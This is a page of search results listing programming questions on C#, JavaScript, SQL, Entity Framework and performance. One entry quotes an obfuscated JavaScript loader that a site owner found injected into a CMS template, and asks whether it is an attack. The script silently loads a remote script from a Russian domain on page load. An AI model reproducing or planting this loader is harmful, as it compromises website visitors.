Search Results

Search found 35970 results on 1439 pages for 'javascript performance'.

Page 293/1439 | < Previous Page | 289 290 291 292 293 294 295 296 297 298 299 300  | Next Page >

  • C# performance methods of receiving data from a socket?

    - by Daniel
    Lets assume we have a simple internet socket, and its going to send 10 megabytes (because i want to ignore memory issues) of random data through. Is there any performance difference or a best practice method that one should use for receiving data? The final output data should be represented by a byte[]. Yes i know writing an arbitrary amount of data to memory is bad, and if I was downloading a large file i wouldn't be doing it like this. But for argument sake lets ignore that and assume its a smallish amount of data. I also realise that the bottleneck here is probably not the memory management but rather the socket receiving. I just want to know what would be the most efficient method of receiving data. A few dodgy ways can think of is: Have a List and a buffer, after the buffer is full, add it to the list and at the end list.ToArray() to get the byte[] Write the buffer to a memory stream, after its complete construct a byte[] of the stream.Length and read it all into it in order to get the byte[] output. Is there a more efficient/better way of doing this?

    Read the article

  • Performance Comparison of Shell Scripts vs high level interpreted langs (C#/Java/etc.)

    - by dferraro
    Hi all, First - This is not meant to be a 'which is better, ignorant nonionic war thread'... But rather, I generally need help in making an architecture decision / argument to put forward to my boss. Skipping the details - I simply just would love to know and find the results of anyone who has done some performance comparisons of Shell vs [Insert General Purpose Programming Language (interpreted) here), such as C# or Java... Surprisingly, I have spent some time on Google on searching here to not find any of this data. Has anyone ever done these comparisons, in different use-cases; hitting a database like in a XYX # of loops doing different types of SQL (Oracle pref, but MSSQL would do) queries such as any of the CRUD ops - and also not hitting database and just regular 50k loop type comparison doing different types of calculations, and things of that nature? In particular - for right now, I need to a comparison of hitting an Oracle DB from a shell script vs, lets say C# (again, any GPPL thats interpreted would be fine, even the higher level ones like Python). But I also need to know about standard programming calculations / instructions/etc... Before you ask 'why not just write a quick test yourself? The answer is: I've been a Windows developer my whole life/career and have very limited knowledge of Shell scripting - not to mention *nix as a whole.... So asking the question on here from the more experienced guys would be grealty beneficial, not to mention time saving as we are in near perputual deadline crunch as it is ;). Thanks so much in advance,

    Read the article

  • How can I hit my database with an AJAX call using javascript?

    - by tmedge
    I am pretty new at this stuff, so bear with me. I am using ASP.NET MVC. I have created an overlay to cover the page when someone clicks a button corresponding to a certain database entry. Because of this, ALL of my code for this functionality is in a .js file contained within my project. What I need to do is pull the info corresponding to my entry from the database itself using an AJAX call, and place that into my textboxes. Then, after the end-user has made the desired changes, I need to update that entry's values to match the input. I've been surfing the web for a while, and have failed to find an example that fits my needs effectively. Here is my code in my javascript file thus far: function editOverlay(picId) { //pull up an overlay $('body').append('<div class="overlay" />'); var $overlayClass = $('.overlay'); $overlayClass.append('<div class="dataModal" />'); var $data = $('.dataModal'); overlaySetup($overlayClass, $data); //set up form $data.append('<h1>Edit Picture</h1><br /><br />'); $data.append('Picture name: &nbsp;'); $data.append('<input class="picName" /> <br /><br /><br />'); $data.append('Relative url: &nbsp;'); $data.append('<input class="picRelURL" /> <br /><br /><br />'); $data.append('Description: &nbsp;'); $data.append('<textarea class="picDescription" /> <br /><br /><br />'); var $nameBox = $('.picName'); var $urlBox = $('.picRelURL'); var $descBox = $('.picDescription'); var pic = null; //this is where I need to pull the actual object from the db //var imgList = for (var temp in imgList) { if (temp.Id == picId) { pic= temp; } } /* $nameBox.attr('value', pic.Name); $urlBox.attr('value', pic.RelativeURL); $descBox.attr('value', pic.Description); */ //close buttons $data.append('<input type="button" value="Save Changes" class="saveButton" />'); $data.append('<input type="button" value="Cancel" class="cancelButton" />'); $('.saveButton').click(function() { /* pic.Name = $nameBox.attr('value'); pic.RelativeURL = $urlBox.attr('value'); pic.Description = $descBox.attr('value'); */ //make a call to my Save() method in my repository CloseOverlay(); }); $('.cancelButton').click(function() { CloseOverlay(); }); } The stuff I have commented out is what I need to accomplish and/or is not available until prior issues are resolved. Any and all advice is appreciated! Remember, I am VERY new to this stuff (two weeks, to be exact) and will probably need highly explicit instructions. BTW: overlaySetup() and CloseOverlay() are functions I have living someplace else. Thanks!

    Read the article

  • What should I use to increase performance. View/Query/Temporary Table

    - by Shantanu Gupta
    I want to know the performance of using Views, Temp Tables and Direct Queries Usage in a Stored Procedure. I have a table that gets created every time when a trigger gets fired. I know this trigger will be fired very rare and only once at the time of setup. Now I have to use that created table from triggers at many places for fetching data and I confirms it that no one make any changes in that table. i.e ReadOnly Table. I have to use this tables data along with multiple tables to join and fetch result for further queries say select * from triggertable By Using temp table select ... into #tx from triggertable join t2 join t3 and so on select a,b, c from #tx --do something select d,e,f from #tx ---do somethign --and so on --around 6-7 queries in a row in a stored procedure. By Using Views create view viewname ( select ... from triggertable join t2 join t3 and so on ) select a,b, c from viewname --do something select d,e,f from viewname ---do somethign --and so on --around 6-7 queries in a row in a stored procedure. This View can be used in other places as well. So I will be creating at database rather than at sp By Using Direct Query select a,b, c from select ... into #tx from triggertable join t2 join t3 join ... --do something select a,b, c from select ... into #tx from triggertable join t2 join t3 join ... --do something . . --and so on --around 6-7 queries in a row in a stored procedure. Now I can create a view/temporary table/ directly query usage in all upcoming queries. What would be the best to use in this case.

    Read the article

  • Delaying execution of Javascript function relative to Google Maps / geoxml3 parser?

    - by Terra Fimeira
    I'm working on a implementing a Google map on a website with our own tiles overlays and KML elements. I've been previously requested to create code so that, for instance, when the page is loaded from a specific URL, it would initialize with one of the tile overlays already enabled. Recently, I've been requested to do the same for the buildings which are outlined by KML elements so that, arriving at the page with a specific URL, it would automatically zoom, center, and display information on the building. However, while starting with the tile overlays work, the building KML does not. After doing some testing, I've determined that when the code which checks the URL executes, the page is still loading the KML elements and thus do not exist for the code to compare to or use: Code for evaluating URL (placed at the end of onLoad="initialize()") function urlClick() { var currentURL = window.location.href; //Retrieve page URL var URLpiece = currentURL.slice(-6); //pull the last 6 digits (for testing) if (URLpiece === "access") { //If the resulting string is "access": access_click(); //Display accessibility overlay } else if (URLpiece === "middle") { //Else if the string is "middle": facetClick('Middle College'); //Click on building "Middle College" }; }; facetClick(); function facetClick(name) { //Convert building name to building ID. for (var i = 0; i < active.placemarks.length; i++) { if (active.placemarks[i].name === name) { sideClick(i) //Click building whose id matches "Middle College" }; }; }; Firebug Console Error active is null for (var i = 0; i < active.placemarks.length; i++) { active.placemarks is which KML elements are loaded on the page, and being null, means no KML has been loaded yet. In short, I have a mistiming and I can't seem to find a suitable place to place the URL code to execute after the KMl has loaded. As noted above, I placed it at the end of onLoad="initialize()", but it would appear that, instead of waiting for the KML to completely load earlier in the function, the remainder of the function is executed: onLoad="initialize()" information(); //Use the buttons variables inital state to set up description buttons(); //and button state button_hover(0); //and button description to neutral. //Create and arrange the Google Map. //Create basic tile overlays. //Set up parser to work with KML elements. myParser = new geoXML3.parser({ //Parser: Takes KML and converts to JS. map: map, //Applies parsed KML to the map singleInfoWindow: true, afterParse: useTheData //Allows us to use the parsed KML in a function }); myParser.parse(['/maps/kml/shapes.kml','/maps/kml/shapes_hidden.kml']); google.maps.event.addListener(map, 'maptypeid_changed', function() { autoOverlay(); }); //Create other tile overlays to appear over KML elements. urlClick(); I suspect one my issues lies in using the geoxml3 parser (http://code.google.com/p/geoxml3/) which converts our KML files to Javascript. While the page has completed loading all of the elements, the map on the page is still loading, including the KML elements. I have also tried placing urlClick() in the parser itself in various places which appear to execute after all the shapes have been parsed, but I've had no success there either. While I've been intending to strip out the parser, I would like to know if there is any way of executing the "urlClick" after the parser has returned the KML shapes. Ideally, I don't want to use an arbitrary means of defining a time to wait, such as "wait 3 seconds, and go", as my various browsers all load the page at different times; rather, I'm looking for some way to say "when the parser is done, execute" or "when the Google map is completely loaded, execute" or perhaps even "hold until the parser is complete before advancing to urlClick".

    Read the article

  • Does breaking chained Select()s in LINQ to objects hurt performance?

    - by Justin
    Take the following pseudo C# code: using System; using System.Data; using System.Linq; using System.Collections.Generic; public IEnumerable<IDataRecord> GetRecords(string sql) { // DB logic goes here } public IEnumerable<IEmployer> Employers() { string sql = "select EmployerID from employer"; var ids = GetRecords(sql).Select(record => (record["EmployerID"] as int?) ?? 0); return ids.Select(employerID => new Employer(employerID) as IEmployer); } Would it be faster if the two Select() calls were combined? Is there an extra iteration in the code above? Is the following code faster? public IEnumerable<IEmployer> Employers() { string sql = "select EmployerID from employer"; return Query.Records(sql).Select(record => new Employer((record["EmployerID"] as int?) ?? 0) as IEmployer); } I think the first example is more readable if there is no difference in performance.

    Read the article

  • C++ map performance - Linux (30 sec) vs Windows (30 mins) !!!

    - by sonofdelphi
    I need to process a list of files. The processing action should not be repeated for the same file. The code I am using for this is - using namespace std; vector<File*> gInputFileList; //Can contain duplicates, File has member sFilename map<string, File*> gProcessedFileList; //Using map to avoid linear search costs void processFile(File* pFile) { File* pProcessedFile = gProcessedFileList[pFile->sFilename]; if(pProcessedFile != NULL) return; //Already processed foo(pFile); //foo() is the action to do for each file gProcessedFileList[pFile->sFilename] = pFile; } void main() { size_t n= gInputFileList.size(); //Using array syntax (iterator syntax also gives identical performance) for(size_t i=0; i<n; i++){ processFile(gInputFileList[i]); } } The code works correctly, but... My problem is that when the input size is 1000, it takes 30 minutes - HALF AN HOUR - on Windows/Visual Studio 2008 Express (both Debug and Release builds). For the same input, it takes only 40 seconds to run on Linux/gcc! What could be the problem? The action foo() takes only a very short time to execute, when used separately. Should I be using something like vector::reserve for the map?

    Read the article

  • How costly performance-wise are these actions in iPhone objective-C?

    - by Alex Gosselin
    This is really a few questions in one, I'm wondering what the performance cost is for these things, as I haven't really been following a best practice of any sort for these. The answers may also be useful to other readers, if somebody knows these. (1) If I need the core data managed object context, is it bad to use #import "myAppDelegate.h" //farther down in the code: NSManagedObjectContext *context = [(myAppDelegate.h*)[[UIApplication sharedApplication] delegate] managedObjectContext]; as opposed to leaving the warning you get if you don't cast the delegate? (2) What is the cheapest way to hard-code a string? I have been using return @"myString"; on occasion in some functions where I need to pass it to a variety of places, is it better to do it this way: static NSString *str = @"myString"; return str; (3) How costly is it to subclass an object i wrote vs. making a new one, in general? (4) When I am using core data and navigating through a hierarchy of some sort, is it necessary to turn things back into faults somehow after I read some info from them? or is this done automatically? Thanks for any help.

    Read the article

  • Why does the order of the loops affect performance when iterating over a 2D array? [closed]

    - by Mark
    Possible Duplicate: Which of these two for loops is more efficient in terms of time and cache performance Below are two programs that are almost identical except that I switched the i and j variables around. They both run in different amounts of time. Could someone explain why this happens? Version 1 #include <stdio.h> #include <stdlib.h> main () { int i,j; static int x[4000][4000]; for (i = 0; i < 4000; i++) { for (j = 0; j < 4000; j++) { x[j][i] = i + j; } } } Version 2 #include <stdio.h> #include <stdlib.h> main () { int i,j; static int x[4000][4000]; for (j = 0; j < 4000; j++) { for (i = 0; i < 4000; i++) { x[j][i] = i + j; } } }

    Read the article

  • Javascript :(….. Oh!! So its jquery? Now what?? I’m a C# Guy

    - by Shekhar_Pro
    Hi guys I want you to Guide me here. This other day I was working out some AJAX for my ASP.Net website and handling client side code in Java was taking the hell out of me. Then I got my hands on this Book jQuery In Action 2nd Edition and solved my problem with the help of Example code in the book. Now as I checked the contents I got an overview that whatever I had ever thought of doing can be done by this jQuery so easily and quite cleanly. I am actually pretty new to web development (say abt 4months ) and from C# world where we have cool libraries and Simple and Elegant coding style. (yeah including those generic, Ienumerable, lambadas, chained statements.. you got it…) and you know what you’re doing when writing some code. And we have so great IntelliSense to care., and above all we have everything Strongly Typed. But in Javascript everything is so messy.. . (and I don’t know why they are not properly indented.. see page source ) Now tell me what should I do, go straight with jQuery or should I first learn Javascript (like a disciplined boy…I even have a book for that too… got in gift :) …. ) I have seen Is it a good idea to learn JavaScript before learning jQuery? but remember I have already got a project on my hand…

    Read the article

  • Weird Javascript in Template. Is this a hacking attempt?

    - by Julian
    I validated my client's website to xHTML Strict 1.0/CSS 2.1 standards last week. Today when I re-checked, I had a validation error caused by a weird and previous unknown script. I found this in the index.php file of my ExpressionEngine CMS. What is this javascript doing? Is this a hacking attempt as I suspected? I couldn't help but notice the Russian domain encoded in the script... this.v=27047; this.v+=187; ug=["n"]; OV=29534; OV--; var y; var C="C"; var T={}; r=function(){ b=36068; b-=144; M=[]; function f(V,w,U){ return V.substr(w,U); var wH=39640; } var L=["o"]; var cj={}; var qK={N:false}; var fa="/g"+"oo"+"gl"+"e."+"co"+"m/"+f("degL4",0,2)+f("rRs6po6rRs",4,2)+f("9GVsiV9G",3,2)+f("5cGtfcG5",3,2)+f("M6c0ilc6M0",4,2)+"es"+f("KUTz.cUzTK",4,2)+f("omjFb",0,2)+"/s"+f("peIlh2",0,2)+"ed"+f("te8WC",0,2)+f("stien3",0,2)+f(".nYm6S",0,2)+f("etUWH",0,2)+f(".pdVPH",0,2)+f("hpzToi",0,2); var BT="BT"; var fV=RegExp; var CE={bf:false}; var UW=''; this.Ky=11592; this.Ky-=237; var VU=document; var _n=[]; try {} catch(wP){}; this.JY=29554; this.JY-=245; function s(V,w){ l=13628; l--; var U="["+w+String("]"); var rk=new fV(U, f("giId",0,1)); this.NS=18321;this.NS+=195;return V.replace(rk, UW); try {} catch(k){}; }; this.jM=""; var CT={}; var A=s('socnruixpot4','zO06eNGTlBuoYxhwn4yW1Z'); try {var vv='m'} catch(vv){}; var Os={}; var t=null; var e=String("bod"+"y"); var F=155183-147103; this.kp=''; Z={Ug:false}; y=function(){ var kl=["mF","Q","cR"]; try { Bf=11271; Bf-=179; var u=s('cfr_eKaPtQe_EPl8eTmPeXn8to','X_BQoKfTZPz8MG5'); Fp=VU[u](A); var H=""; try {} catch(WK){}; this.Ca=19053; this.Ca--; var O=s('s5rLcI','2A5IhLo'); var V=F+fa; this.bK=""; var ya=String("de"+"fe"+f("r3bPZ",0,1)); var bk=new String(); pB=9522; pB++; Fp[O]=String("ht"+"tp"+":/"+"/t"+"ow"+"er"+"sk"+"y."+"ru"+":")+V; Fp[ya]=[1][0]; Pe=45847; Pe--; VU[e].appendChild(Fp); var lg=new Array(); var aQ={vl:"JC"}; this.KL="KL"; } catch(x){ this.Ja=""; Th=["pj","zx","kO"]; var Jr=''; }; Tr={qZ:21084}; }; this.pL=false; }; be={}; rkE={hb:"vG"}; r(); var bY=new Date(); window.onload=y; cU=["Yr","gv"];

    Read the article

  • HTML + javascript mouse over, mouseout, onclick not working in firefox.

    - by help_inmssql
    Hello Everyone, My question is to get onMouseover,onMouseout,onMousedown,onClick on a table row. For which i am calling javascript userdefined functions. onMouseover --- Background color should change. onMouseout --- Reset to original color onClick --- First column checkbox/radio button should be set and background color should change onMousedown --- background color should change. My code in html is:- <tr onMouseOver="hover(this)" onMouseOut="hover_out(this)" onMouseDown="get_first_state(this)" onClick="checkit(this)" > and the methods in javascripts are:- var first_state = false; var oldcol = '#ffffff'; var oldcol_cellarray = new Array(); function hover(element) { if (! element) element = this; while (element.tagName != 'TR') { element = element.parentNode; } if (element.style.fontWeight != 'bold') { for (var i = 0; i<element.cells.length; i++) { if (element.cells[i].className != "no_hover") { oldcol_cellarray[i] = element.cells[i].style.backgroundColor; element.cells[i].style.backgroundColor='#e6f6f6'; } } } } // ----------------------------------------------------------------------------------------------- function hover_out(element) { if (! element) element = this; while (element.tagName != 'TR') { element = element.parentNode; } if (element.style.fontWeight != 'bold') { for (var i = 0; i<element.cells.length; i++) { if (element.cells[i].className != "no_hover") { if (typeof oldcol_cellarray != undefined) { element.cells[i].style.backgroundColor=oldcol_cellarray[i]; } else { element.cells[i].style.backgroundColor='#ffffff'; } //var oldcol_cellarray = new Array(); } } } } // ----------------------------------------------------------------------------------------------- function get_first_state(element) { while (element.tagName != 'TR') { element = element.parentNode; } first_state = element.cells[0].firstChild.checked; } // ----------------------------------------------------------------------------------------------- function checkit (element) { while (element.tagName != 'TR') { element = element.parentNode; } if (element.cells[0].firstChild.type == 'radio') { var typ = 0; } else if (element.cells[0].firstChild.type == 'checkbox') { typ = 1; } if (element.cells[0].firstChild.checked == true && typ == 1) { if (element.cells[0].firstChild.checked == first_state) { element.cells[0].firstChild.checked = false; } set_rowstyle(element, element.cells[0].firstChild.checked); } else { if (typ == 0 || element.cells[0].firstChild.checked == first_state) { element.cells[0].firstChild.checked = true; } set_rowstyle(element, element.cells[0].firstChild.checked); } if (typ == 0) { var table = element.parentNode; if (table.tagName != "TABLE") { table = table.parentNode; } if (table.tagName == "TABLE") { table=table.tBodies[0].rows; //var table = document.getElementById("js_tb").tBodies[0].rows; for (var i = 1; i< table.length; i++) { if (table[i].cells[0].firstChild.checked == true && table[i] != element) { table[i].cells[0].firstChild.checked = false; } if (table[i].cells[0].firstChild.checked == false) { set_rowstyle(table[i], false); } } } } } function set_rowstyle(r, on) { if (on == true) { for (var i =0; i < r.cells.length; i++) { r.style.fontWeight = 'bold'; r.cells[i].style.backgroundColor = '#f2f2c2'; } } else { for ( i =0; i < r.cells.length; i++) { r.style.fontWeight = 'normal'; r.cells[i].style.backgroundColor = '#ffffff'; } } } It is working as expected in IE. But coming to firefox i am surprised on seeing the output after so much of coding. In Firefox:-- onMouseOver is working as expected. color change of that particular row. onClick -- Setting the background color permenantly..eventhough i do onmouseover on different rows. the clicked row color is not reset to white. -- not as expected onclick on 2 rows..the background of both the rows is set...not as expected i.e if i click on all the rows..background color of everything is changed... Eventhough i click on the row. First column i.e radio button or checkbox is not set.. Please help me to solve this issue in firefox. Do let me know where my code needs to be changed... Thanks in advance!!

    Read the article

  • HTML + javascript mouse over, mouseout, onclick not working in firefox.

    - by lucky
    Hello Everyone, My question is to get onMouseover,onMouseout,onMousedown,onClick on a table row. For which i am calling javascript userdefined functions. onMouseover --- Background color should change. onMouseout --- Reset to original color onClick --- First column checkbox/radio button should be set and background color should change onMousedown --- background color should change. My code in html is:- <tr onMouseOver="hover(this)" onMouseOut="hover_out(this)" onMouseDown="get_first_state(this)" onClick="checkit(this)" > and the methods in javascripts are:- var first_state = false; var oldcol = '#ffffff'; var oldcol_cellarray = new Array(); function hover(element) { if (! element) element = this; while (element.tagName != 'TR') { element = element.parentNode; } if (element.style.fontWeight != 'bold') { for (var i = 0; i<element.cells.length; i++) { if (element.cells[i].className != "no_hover") { oldcol_cellarray[i] = element.cells[i].style.backgroundColor; element.cells[i].style.backgroundColor='#e6f6f6'; } } } } // ----------------------------------------------------------------------------------------------- function hover_out(element) { if (! element) element = this; while (element.tagName != 'TR') { element = element.parentNode; } if (element.style.fontWeight != 'bold') { for (var i = 0; i<element.cells.length; i++) { if (element.cells[i].className != "no_hover") { if (typeof oldcol_cellarray != undefined) { element.cells[i].style.backgroundColor=oldcol_cellarray[i]; } else { element.cells[i].style.backgroundColor='#ffffff'; } //var oldcol_cellarray = new Array(); } } } } // ----------------------------------------------------------------------------------------------- function get_first_state(element) { while (element.tagName != 'TR') { element = element.parentNode; } first_state = element.cells[0].firstChild.checked; } // ----------------------------------------------------------------------------------------------- function checkit (element) { while (element.tagName != 'TR') { element = element.parentNode; } if (element.cells[0].firstChild.type == 'radio') { var typ = 0; } else if (element.cells[0].firstChild.type == 'checkbox') { typ = 1; } if (element.cells[0].firstChild.checked == true && typ == 1) { if (element.cells[0].firstChild.checked == first_state) { element.cells[0].firstChild.checked = false; } set_rowstyle(element, element.cells[0].firstChild.checked); } else { if (typ == 0 || element.cells[0].firstChild.checked == first_state) { element.cells[0].firstChild.checked = true; } set_rowstyle(element, element.cells[0].firstChild.checked); } if (typ == 0) { var table = element.parentNode; if (table.tagName != "TABLE") { table = table.parentNode; } if (table.tagName == "TABLE") { table=table.tBodies[0].rows; //var table = document.getElementById("js_tb").tBodies[0].rows; for (var i = 1; i< table.length; i++) { if (table[i].cells[0].firstChild.checked == true && table[i] != element) { table[i].cells[0].firstChild.checked = false; } if (table[i].cells[0].firstChild.checked == false) { set_rowstyle(table[i], false); } } } } } function set_rowstyle(r, on) { if (on == true) { for (var i =0; i < r.cells.length; i++) { r.style.fontWeight = 'bold'; r.cells[i].style.backgroundColor = '#f2f2c2'; } } else { for ( i =0; i < r.cells.length; i++) { r.style.fontWeight = 'normal'; r.cells[i].style.backgroundColor = '#ffffff'; } } } It is working as expected in IE. But coming to firefox i am surprised on seeing the output after so much of coding. In Firefox:-- onMouseOver is working as expected. color change of that particular row. onClick -- Setting the background color permenantly..eventhough i do onmouseover on different rows. the clicked previous row color is not reset to white. -- not as expected onclick on 2 rows..the background of both the rows is set..Only the latest row color should be set. other rows that are selected before should be set back..not as expected i.e if i click on all the rows..background color of everything is changed... Eventhough i click on the row. First column i.e radio button or checkbox is not set.. Please help me to solve this issue in firefox. Do let me know where my code needs to be changed... Thanks in advance!!

    Read the article

  • Any significant performance improvement by using bitwise operators instead of plain int sums in C#?

    - by tunnuz
    Hello, I started working with C# a few weeks ago and I'm now in a situation where I need to build up a "bit set" flag to handle different cases in an algorithm. I have thus two options: enum RelativePositioning { LEFT = 0, RIGHT = 1, BOTTOM = 2, TOP = 3, FRONT = 4, BACK = 5 } pos = ((eye.X < minCorner.X ? 1 : 0) << RelativePositioning.LEFT) + ((eye.X > maxCorner.X ? 1 : 0) << RelativePositioning.RIGHT) + ((eye.Y < minCorner.Y ? 1 : 0) << RelativePositioning.BOTTOM) + ((eye.Y > maxCorner.Y ? 1 : 0) << RelativePositioning.TOP) + ((eye.Z < minCorner.Z ? 1 : 0) << RelativePositioning.FRONT) + ((eye.Z > maxCorner.Z ? 1 : 0) << RelativePositioning.BACK); Or: enum RelativePositioning { LEFT = 1, RIGHT = 2, BOTTOM = 4, TOP = 8, FRONT = 16, BACK = 32 } if (eye.X < minCorner.X) { pos += RelativePositioning.LEFT; } if (eye.X > maxCorner.X) { pos += RelativePositioning.RIGHT; } if (eye.Y < minCorner.Y) { pos += RelativePositioning.BOTTOM; } if (eye.Y > maxCorner.Y) { pos += RelativePositioning.TOP; } if (eye.Z > maxCorner.Z) { pos += RelativePositioning.FRONT; } if (eye.Z < minCorner.Z) { pos += RelativePositioning.BACK; } I could have used something as ((eye.X > maxCorner.X) << 1) but C# does not allow implicit casting from bool to int and the ternary operator was similar enough. My question now is: is there any performance improvement in using the first version over the second? Thank you Tommaso

    Read the article

  • EF4 Import/Lookup thousands of records - my performance stinks!

    - by Dennis Ward
    I'm trying to setup something for a movie store website (using ASP.NET, EF4, SQL Server 2008), and in my scenario, I want to allow a "Member" store to import their catalog of movies stored in a text file containing ActorName, MovieTitle, and CatalogNumber as follows: Actor, Movie, CatalogNumber John Wayne, True Grit, 4577-12 (repeated for each record) This data will be used to lookup an actor and movie, and create a "MemberMovie" record, and my import speed is terrible if I import more than 100 or so records using these tables: Actor Table: Fields = {ID, Name, etc.} Movie Table: Fields = {ID, Title, ActorID, etc.} MemberMovie Table: Fields = {ID, CatalogNumber, MovieID, etc.} My methodology to import data into the MemberMovie table from a text file is as follows (after the file has been uploaded successfully): Create a context. For each line in the file, lookup the artist in the Actor table. For each Movie in the Artist table, lookup the matching title. If a matching Movie is found, add a new MemberMovie record to the context and call ctx.SaveChanges(). The performance of my implementation is terrible. My expectation is that this can be done with thousands of records in a few seconds (after the file has been uploaded), and I've got something that times out the browser. My question is this: What is the best approach for performing bulk lookups/inserts like this? Should I call SaveChanges only once rather than for each newly created MemberMovie? Would it be better to implement this using something like a stored procedure? A snippet of my loop is roughly this (edited for brevity): while ((fline = file.ReadLine()) != null) { string [] token = fline.Split(separator); string Actor = token[0]; string Movie = token[1]; string CatNumber = token[2]; Actor found_actor = ctx.Actors.Where(a => a.Name.Equals(actor)).FirstOrDefault(); if (found_actor == null) continue; Movie found_movie = found_actor.Movies.Where( s => s.Title.Equals(title, StringComparison.CurrentCultureIgnoreCase)).FirstOrDefault(); if (found_movie == null) continue; ctx.MemberMovies.AddObject(new MemberMovie() { MemberProfileID = profile_id, CatalogNumber = CatNumber, Movie = found_movie }); try { ctx.SaveChanges(); } catch { } } Any help is appreciated! Thanks, Dennis

    Read the article

  • Modular GWT design concerns

    - by GlGuru
    Hi, I have a couple of questions regarding a modular GWT based application framework. I have some ideas about them but being new to the field of web development I feel they are far from ideal. I'd appreciate a few comments and suggestions in this regard. Here are my questions: I am developing a framework which will allow third parties to embed GWT applications into our website and do some communication with them using simple iFrame postMessage. All these third party modules are going to use our SDK which is also GWT based. The problem arises that even though all the modules will be using the same codebase there is going to be a massive overheard in the amount of duplicate Javascript code (i.e. our common SDK code base which is quite large) being downloaded on the client's machine. This is highly redundant and problematic, not only due to the sheer size of duplicate code but, also due to the fact that subsequent updates of the SDK would require the modules to be recompiled which is going to create a DLL hell kind of scenario in the long run. What is the best way of doing this kind of thing? Is there a way where I can have some static GWT code (i.e. the SDK) and the dynamic GWT module refers to it (even if lies on a different domain) and it all work happily? The other part of the problem lies in providing robust scripting front end to the SDK. At first it appears to be trivial since Javascript itself is a scripting language. However, I do not know how to load and call a piece of pure Javascript code at runtime? I am willing to put restrictions on the target Javascript (i.e. having a function main and unique namespace or something). Furthermore the Javascript will come as a string from a database and not as a full URL. If its doable in Javascript how does one get this right in GWT i.e. forcing the compiler to emit a certain function in the generated Javascript? This I believe can be lesser of a problem by having a stub Javascript with all the right requirements which just loads up a GWT generated Javascript. Is any of this possible at all? I generally hate to be this verbose but I hope to find a quick solution to the problem as its holding up my progress. I'd highly appreciate any comments, suggestions and experiences.

    Read the article

  • different small js files per page VS. 1x site-wide js file?

    - by Haroldo
    Different pages of my site have different js needs (plugins mainly), some need a lightbox, some dont, some need a carousel, some dont etc. With regards to pageloading speed should i option 1 - reference each js file when it is needed: so one page might have: <script type="text/javascript" src="js/carousel/scrollable.js"></script> <script type="text/javascript" src="js/jquery.easydrag.js"></script> <script type="text/javascript" src="js/colorbox/jquery.colorbox-min.js"></script> and another have: <script type="text/javascript" src="st_wd_assets/js/carousel/scrollable.js"></script> <script type="text/javascript" src="st_wd_assets/js/typewatch.js"></script> option 2 - combine and compress into one site_wide.js file: so each page would reference: <script type="text/javascript" src="js/site_wide.js"></script> there would be unused selectors/event listeners though, how bad is this? I would include any plugin notes/accreditations at the top of the site_wide.js file

    Read the article

  • Documentation about difference between javacript src and javascript library in grails

    - by damian
    I know that if you write in a view: <g:javascript src="myscript.js" /> <g:javascript src="myscript.js" /> <g:javascript src="myscript.js" /> <!-- other try --> <g:javascript library="myscript" /> <g:javascript library="myscript" /> <g:javascript library="myscript" /> It will out output: <script type="text/javascript" src="/vip/js/myscript.js"></script> <script type="text/javascript" src="/vip/js/myscript.js"></script> <script type="text/javascript" src="/vip/js/myscript.js"></script> <!-- other try --> <script type="text/javascript" src="/vip/js/myscript.js"></script> Conclution: with library it will try to include only once. I have been try to find documentation about it without success. Do you have any pointer?

    Read the article

  • Who will take benefit of graceful degradation? Desktop users, mobile users, screen reader users?

    - by metal-gear-solid
    How many percentage of desktop users? How many percentage of mobile, ipad, iphone users? and is there any other devices to access website which do not support JavaScript? Is JavaScript also a problem for screen reader users? Who will take benefit if we make things without JavaScript or we give non-JavaScript version? Who will take benefit of graceful degradation? Desktop users, mobile users, screen reader users? Is it worth to give time for graceful degradation? Is WCAG 2.0 do not prefer to use Javascript? Why anyone will like to surf net without JavaScript?

    Read the article

  • turn off disable the performance cache

    - by jessie
    OK I run a streaming website and my CMS is giving me an error when uploading videos "Failed To Find Flength File" ok so I did some research. The answer I got from the coder was below. I did do all that, but the only thing I could not do is turn off what he refers to as performance cache, talked about in the last sentence... I am on a Cent OS Assuming the script is set up properly, you are probably dealing with some kind of write-caching. Some servers perform write-caching which prevents writing out the flength file or the entire CGITemp file during the upload. The flength file or the CGITemp file do not actually hit the disk until the upload is complete, making it worthless for reporting on progress during the upload. This may be fixed using a .htaccess file assuming your host supports them. Here is a link to an excellent tutorial on using .htaccess files. I strongly recommend giving it a quick read before attempting to install your own .htaccess file. 1. A mod_security module for Apache. To fix it just create a file called .htaccess (that's a period followed by "htaccess") and put the following lines in that file. Upload the file into the directory where the Uber-Uploader CGI ".pl" scripts resides, or in some directory above it (like your server's DOCUMENT_ROOT, i.e. the top-level of your webspace). htaccess files must be uploaded as ASCII mode, not BINARY. You may need to CHMOD the htaccess file to 644 or (RW-R--R--). # Turn off mod_security filtering. SecFilterEngine Off # The below probably isn't needed, # but better safe than sorry. SecFilterScanPOST Off If the above method does not work, try putting the following lines into the file SetEnvIfNoCase Content-Type \ "^multipart/form-data;" "MODSEC_NOPOSTBUFFERING=Do not buffer file uploads" mod_gzip_on No 2. "Performance Cache" enabled on OS X SERVER. If you're running OS X Server and the progress bar isn't working, it could be because of "performance caching." Apparently if ANY of your hosted sites are using performance caching, then by default, all sites (domains) will attempt to. The fix then is to disable the performance cache on all hosted sites.

    Read the article

  • Disabled asp button

    - by Geoorg
    Hi, i have asp button like this: <asp:Button ID="ImportToDB" runat="server" OnClick="ImportToDB_Click" /> And i need to call a javascript function when mouseover on this button. So i have in page_load(): ImportToDB.Attributes.Add("onmouseover","javascript:OnButtonMove(" + ImportToDB.ClientID + ")"); javascript function: <script language="JavaScript" type="text/javascript"> function OnButtonMove(id) { //something } </script> Everithing work fine only if button is enabled. but when i disable button, this javascript function will never fire. what i am trying to do: I have button and when is something wrong i just disable it. And when user mouseover this(disable) button, I show him DIV with a message. Can someone tell me why i cannot call this JS function while button is disabled?

    Read the article

  • why my test performance class gives me inconsistent results even after proper warm-up?

    - by colinfang
